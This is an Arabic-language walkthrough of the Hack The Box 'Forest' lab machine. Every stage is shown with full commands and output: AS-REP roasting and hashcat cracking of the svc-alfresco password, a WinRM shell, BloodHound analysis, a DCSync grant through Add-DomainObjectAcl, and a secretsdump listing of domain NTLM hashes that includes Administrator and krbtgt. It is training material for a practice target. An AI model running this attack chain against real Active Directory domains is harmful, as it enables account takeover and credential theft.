Forest - بالعربي

حل forest بالعربي

Recon

1- تبدأ الاول بعمل Scan على الماشين ب nmap عشان تشوف ال Open Ports الموجودة و ال services/الخدمات و شو منهم فيه ثغرة/vulnerable فتستغله و طبعا بدون عمل استطلاع/recon او enumeration ما ممكن تبدأ اي عملية Pentesting او Hacking

nmap -sV -sC -p- <IP>

2- متل مالنا شايفين هون, هنا شوية شغلات مثيرة للاهتمام متل ال kerberos, ldap, msrpc, smb

‌SMB

رح استخدم اداتين smbclient & smbmap

smbmap -H 10.10.10.161
[+] IP: 10.10.10.161:445 Name: FOREST.htb.local
smbclient -L 10.10.10.161
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

ضفت الدومين لل

/etc/hosts

بس ما كان جدا مفيد, يعني ممكن يستخدم بال DNS Enum بس ما مفيد زيادة, جربت كمان استخدم ال scripts تبعيت nmap و بلا نتيجة.

لسا ماخلصنا كلشي, فخلينا نكمل

‌MSRPC

rpcclient -U "" -N 10.10.10.161

هلق رح يطلعلك

rpcclient $>

هلق فينا نبدأ نعمل enumeration

enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

ضفت النتائج لملف, و استخدمت هاد الامر لأخد الاسماء بس

awk '{print $1}' rpc_users.txt | egrep -o '\[.*.\]' | sed -e 's/\[//g; s/\]//g'
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi

بعدها مسحت اي اسم ببدأ ب SM او HealthMailbox, فبتكون النتيجة كلاتي:

Administrator
Guest
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi

بعد ما اخدت المستخدمين بدأ باني اجمع بيانات اكتر

enumprivs #Enumerate privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
enumdomgroups #Enumerate domain groups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
enumdomains # Enumerate domains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
dsenumdomtrusts # Enumerate all trusted domains in an AD forest
1 domains returned
htb.local (HTB)

فعليا كل الي عم سويه هو جمع معلومات, كرمال افهم اكتر عن الهدف ما رح اشرح كلشي طلع لانو 1- كمية بيانات كتير, صعب شرحها 2- اعتقد انها واضحة لدرجة ما

نبدأ مع ال LDAP

LDAP

nmap -n -sV --script "ldap* and not brute" 10.10.10.161

رح تحصل بيانات كتير, فصعب احطها هون بس انت اعمل ال enum و العب معها شوي, الامر ممتع :)

‌AS-REP Roasting‌‌

صار لازم نصعد اللعبة شوي و نحاول ناخد access على الماشين, ف رح استخدم تكنيك اسمه AS-REP Roasting و فكرته عن المستخدمين الي ما بحتاجو شغلة اسمها Pre-Authentication, طبعا الموضوع اعمق من هيك حبة و رح اشرحه ان شاء الله بمقال لحاله

استخدمت المستخدمين الي طلعناهم من قبل و اداة GetNPUsers

impacket-GetNPUsers -format hashcat -usersfile users.txt -no-pass -k -dc-ip 10.10.10.161 HTB.LOCAL/

و هيك طلعنا بال hash تبع المستخدم svc-alfresco

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:5fc55218d956123aa894674806657af5$24c44c1eead97538ba16fa0b68f0ded32da012141d01f123eff53709886c6c2b1bca60c097dad0ab2b892678f53af135a934c1a2ff9d6508ad35f165474727eb774ccdf81720c2bb948a561ae616408db454a0c83008f8665b4b75a0bf73205545821e1a5b366c49c1ff569b1ba7db7db791be317bc0a47c8b7b4a394109f4870c0f1463e9392cc369ff70aa0529d3382ca2b14eb84dad313d0eb2693c089761a6ca4e97b7449faf550af823c33a8bf2d4ecba4e1c9dc78010d82fd963699b613fd539ce96303390c9360646f877a160d1d0c311ea3d497878a4861f797a9030f4b779455da0
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

هلق منكسرو او منعملو crack بأداة متل hashcat

hashcat -m 18200 svc-alfresco_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU

كلمة السر s3rvice

[email protected]:5fc55218d956123aa894674806657af5$24c44c1eead97538ba16fa0b68f0ded32da012141d01f123eff53709886c6c2b1bca60c097dad0ab2b892678f53af135a934c1a2ff9d6508ad35f165474727eb774ccdf81720c2bb948a561ae616408db454a0c83008f8665b4b75a0bf73205545821e1a5
b366c49c1ff569b1ba7db7db791be317bc0a47c8b7b4a394109f4870c0f1463e9392cc369ff70aa0529d3382ca2b14eb84dad313d0eb2693c089761a6ca4e97b7449faf550af823c33a8bf2d4ecba4e1c9dc78010d82fd963699b613fd539ce96303390c9360646f877a160d1d0c311ea3d497878a4861f797a9030f4b779455da0:s3rvice

CREDS: svc-alfresco:s3rvice

حاليا حصلنا الهاش, عملناله كراك, و حصلنا كلمة السر

هلق رح نرجع نعيد ال enum مع اسم المستخدم و كلمة السر الي حصلناهم بأداة crackmapexec

crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' /forest.htb.local
WINRM 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
WINRM 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

هاد بعني ان ممكن ندخل بالبيانات المعنا على الماشين, بس ما رح ندخل هلق قبلها enum اكتر

SMB with svc-alfresco account

smbmap -H 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
[+] IP: 10.10.10.161:445 Name: FOREST.htb.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
smbclient -L 10.10.10.161 -U 'svc-alfresco'
Enter WORKGROUP\svc-alfresco's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

ما في شي مثير للاهتمام هون, انا تفقدتمهم كلهم مافي شي مهم, فنروح ل winrm

Get Access

evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Post-Exploitation

طبعا انت لحالك روح و جيب ال user.txt انا رح حمل ال powerview.ps1 و اعمل enum للماشين

A lot of enum, A lot of info.

PowerView.ps1

upload powerview.ps1 # if you don't have powerview in the same file, just put the tool's path
. .\powerview.ps1 # import the modules

رح نعمل شوية enum و بعدها رح استخدم ادوات اوتوماتيكية اكتر

Get-NetDomain
Forest : htb.local
DomainControllers : {FOREST.htb.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : FOREST.htb.local
RidRoleOwner : FOREST.htb.local
InfrastructureRoleOwner : FOREST.htb.local
Name : htb.local
Get-DomainSID
S-1-5-21-3072663084-364016917-1341370565
Get-DomainPolicy
Unicode : @{Unicode=yes}
SystemAccess : @{MinimumPasswordAge=1; MaximumPasswordAge=42; LockoutBadCount=0; PasswordComplexity=0; RequireLogonToChangePassword=0; LSAAnonymousNameLookup=0; ForceLogoffWhenHourExpire=0; PasswordHistorySize=24; ClearTextPassword=0;
MinimumPasswordLength=7}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
KerberosPolicy : @{MaxTicketAge=10; MaxServiceAge=600; MaxClockSkew=5; MaxRenewAge=7; TicketValidateClient=1}
Version : @{Revision=1; signature="$CHICAGO$"}
Get-NetDomainController
Forest : htb.local
CurrentTime : 5/8/2021 8:29:17 PM
HighestCommittedUsn : 469291
OSVersion : Windows Server 2016 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : htb.local
IPAddress : ::1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : FOREST.htb.local
Partitions : {DC=htb,DC=local, CN=Configuration,DC=htb,DC=local, CN=Schema,CN=Configuration,DC=htb,DC=local, DC=DomainDnsZones,DC=htb,DC=local...}
Get-NetUser | select cn
cn
--
Administrator
Guest
DefaultAccount
krbtgt
Exchange Online-ApplicationAccount
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
Migration.8f3e7716-2011-43e4-96b1-aba62d229136
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
HealthMailboxfc9daad117b84fe08b081886bd8a5a50
HealthMailboxc0a90c97d4994429b15003d6a518f3f5
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
HealthMailbox968e74dd3edb414cb4018376e7dd95ba
HealthMailbox6ded67848a234577a1756e072081d01f
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
HealthMailboxfd87238e536e49e08738480d300e3772
HealthMailboxb01ac647a64648d2a5fa21df27058a24
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
Sebastien Caron
Lucinda Berger
svc-alfresco
Andy Hislip
Mark Brandt
Santi Rodriguez
Get-UserProperty -Properties badpwdcount
name badpwdcount
---- -----------
Administrator 0
Guest 0
DefaultAccount 0
krbtgt 0
Exchange Online-ApplicationAccount 0
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 0
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 0
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 0
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 0
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 0
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 0
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 0
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 0
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 0
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 0
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 0
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 0
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 0
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 0
HealthMailbox6ded67848a234577a1756e072081d01f 0
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 0
HealthMailboxfd87238e536e49e08738480d300e3772 0
HealthMailboxb01ac647a64648d2a5fa21df27058a24 0
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 0
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 0
Sebastien Caron 0
Lucinda Berger 0
svc-alfresco 0
Andy Hislip 0
Mark Brandt 0
Santi Rodriguez 0
Get-UserProperty -Properties pwdlastset
name pwdlastset
---- ----------
Administrator 9/18/2019 10:09:08 AM
Guest 12/31/1600 4:00:00 PM
DefaultAccount 12/31/1600 4:00:00 PM
krbtgt 9/18/2019 3:53:23 AM
Exchange Online-ApplicationAccount 12/31/1600 4:00:00 PM
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 12/31/1600 4:00:00 PM
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 12/31/1600 4:00:00 PM
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 12/31/1600 4:00:00 PM
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 12/31/1600 4:00:00 PM
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 12/31/1600 4:00:00 PM
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 12/31/1600 4:00:00 PM
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 12/31/1600 4:00:00 PM
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 12/31/1600 4:00:00 PM
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 12/31/1600 4:00:00 PM
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 9/23/2019 3:51:31 PM
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 9/23/2019 3:51:35 PM
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 9/19/2019 4:56:35 AM
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 9/19/2019 4:56:45 AM
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 9/19/2019 4:56:56 AM
HealthMailbox6ded67848a234577a1756e072081d01f 9/19/2019 4:57:06 AM
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 9/19/2019 4:57:17 AM
HealthMailboxfd87238e536e49e08738480d300e3772 9/19/2019 4:57:27 AM
HealthMailboxb01ac647a64648d2a5fa21df27058a24 9/19/2019 4:57:37 AM
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 9/19/2019 4:57:48 AM
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 9/19/2019 4:57:58 AM
Sebastien Caron 9/19/2019 5:29:59 PM
Lucinda Berger 9/19/2019 5:44:13 PM
svc-alfresco 5/8/2021 1:49:05 PM
Andy Hislip 9/22/2019 3:44:16 PM
Mark Brandt 9/20/2019 3:57:30 PM
Santi Rodriguez 9/20/2019 4:02:55 PM
Get-UserProperty -Properties logoncount
name logoncount
---- ----------
Administrator 49
Guest 0
DefaultAccount 0
krbtgt 0
Exchange Online-ApplicationAccount 0
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 0
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 0
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 0
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 0
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 0
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 0
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 0
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 0
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 0
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 1470
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 59
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 0
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 0
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 0
HealthMailbox6ded67848a234577a1756e072081d01f 0
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 0
HealthMailboxfd87238e536e49e08738480d300e3772 0
HealthMailboxb01ac647a64648d2a5fa21df27058a24 0
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 0
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 0
Sebastien Caron 8
Lucinda Berger 0
svc-alfresco 6
Andy Hislip 0
Mark Brandt 0
Santi Rodriguez 0
Get-NetComputer # you can use '-FullData' and get so much more info, or use 'select' withit to get what you want
FOREST.htb.local
EXCH01.htb.local
Get-NetGroup
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
System Managed Accounts Group
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Organization Management
Recipient Management
View-Only Organization Management
Public Folder Management
UM Management
Help Desk
Records Management
Discovery Management
Server Management
Delegated Setup
Hygiene Management
Compliance Management
Security Reader
Security Administrator
Exchange Servers
Exchange Trusted Subsystem
Managed Availability Servers
Exchange Windows Permissions
ExchangeLegacyInterop
$D31000-NSEL5BRJ63V7
Service Accounts
Privileged IT Accounts
test

في كتير طرق تانية لسا و اوامر تانية ممكن نستخدمها نجمع معلومات بس هاد رح يطول الموضوع جدا, ف رح ابدأ مع SharpHound.ps1

‌PrivEsc‌‌‌‌‍‌‌

upload SharpHound.ps1
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser svc-alfresco -LDAPPass s3rvice
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 2:02 PM 15384 20210508140254_BloodHound.zip
download 20210508140254_BloodHound.zip

حمل الملف هاد ل bloodhound بعدها روح ل analysis بعدها اضغط على Find Shortest Paths to Domain Admins و رح تصير بهاد الشكل

انا الصراحة تركت كلشي و رحت ورا EXCHANGE WINDOWS [email protected] و السبب ان لفت نظري و لمحتها بعدة اماكن تانية. تاني شغلة لفتت انتباهي هي ال writeDACL, لفتت انتباهي لأمرين: 1- انا متأكد اني قرأت عنها من قبل 2- مامتذكر او مابعرف شو هي فالموضوع مثير للفضول اعرف شو هي عملت بحثي و اول شي طلع ب وشي:

بعد ما درست الموضوع رجعت احلل تاني و هون رحت اول شغلة سويتها اني حددت المستخدم تبعنا ك owned 2- اضغط عليه 3- رح تطلعلك لائحة اضغط على ال node info 4- اضغط على Reachable High Value Targets هلق الموضوع الطف (ما تسأل ليش, اقتنع انه الطف و بس)

طيب انت شو شايف هون؟ ماتهتم انا رح قلك المستخدم تبعنا svc-alfresco عضو بجروب Service Accounts و الي بدوره عضو ب Privileged IT Accounts Group و الي بدوره عضو ب Account Operators Group و الي بدوره Exchange Windows Permissions و ال Exchange Windows Permissions Group عنده الأذونات الي اسمها WriteDACL (مافهمت؟ بسيطة! اقرأ تاني) هاد كله بعني ان by default المفروض المستخدم تبعنا او المستخدم الي رح يكون بهاد الجروب عنده الأذونات ليفير على ال domain نفسه

انا جربت مجموعة من الادوات عشان استغلها و مانفع, بس الي لاحظته ان الاستغلال بمشي كلاتي: 1- انشئ مستخدم 2- ضيف المستخدم ل Exchange Windows Permissions Group 3- اعمل import لل PowerView.ps1 4- استخدم ال Add-DomainObjectAcl Function 5- استخدم secretsdump مع المستخدم الجديد عشان تطلع ال hashes تبعيت المستخدمين التانيين

الاوامر:

net user mhzcyber PlzhackIT /add /domain
net group "Exchange Windows Permissions" /add mhzcyber
$SecPassword = ConvertTo-SecureString 'PlzhackIT' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\mhzcyber', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity mhzcyber -Rights DCSync # this will need you to use PowerView.ps1

طيب, كيف عرفت انا استغلها؟ في ناس شارحة + ان لو ضغطت كليك يمين على الخط تبع ال WriteDACL جوا اداة BloodHound رح تلاقي Help? بعدها اضغط Abuse info و رح تلاقي شرح.

WriteDACL -> ? Help -> Abuse Info.

impacket-secretsdump htb.local/mhzcyber:[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
